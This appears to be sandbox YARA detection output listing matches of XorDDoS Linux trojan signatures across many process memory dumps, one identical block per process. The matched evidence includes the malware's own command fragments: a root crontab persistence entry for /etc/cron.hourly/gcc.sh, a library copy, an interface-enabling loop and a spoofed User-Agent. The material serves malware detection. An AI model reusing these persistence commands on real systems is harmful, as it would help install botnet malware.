6265.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6265.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6265.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6265.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6265.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6265.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6265.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6505.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6505.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6505.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6505.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6505.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6505.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6505.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6527.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6527.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6527.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6527.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6527.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6527.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6527.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6411.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6411.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6411.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6411.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6411.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6411.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6411.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6439.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6439.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6439.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6439.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6439.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6439.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6439.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6340.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6340.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6340.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6340.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6340.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6340.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6340.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6393.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6393.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6393.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6393.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6393.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6393.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6393.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6337.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6337.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6337.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6337.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6337.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6337.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6337.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6408.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6408.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6408.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6408.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6408.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6408.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6408.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6405.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6405.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6405.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6405.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6405.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6405.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6405.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6390.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6390.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6390.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6390.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6390.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6390.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6390.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6366.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6366.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6366.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6366.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6366.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6366.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6366.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6207.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6207.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6207.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6207.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6207.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6207.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6207.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6513.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6513.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6513.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6513.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6513.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6513.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6513.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
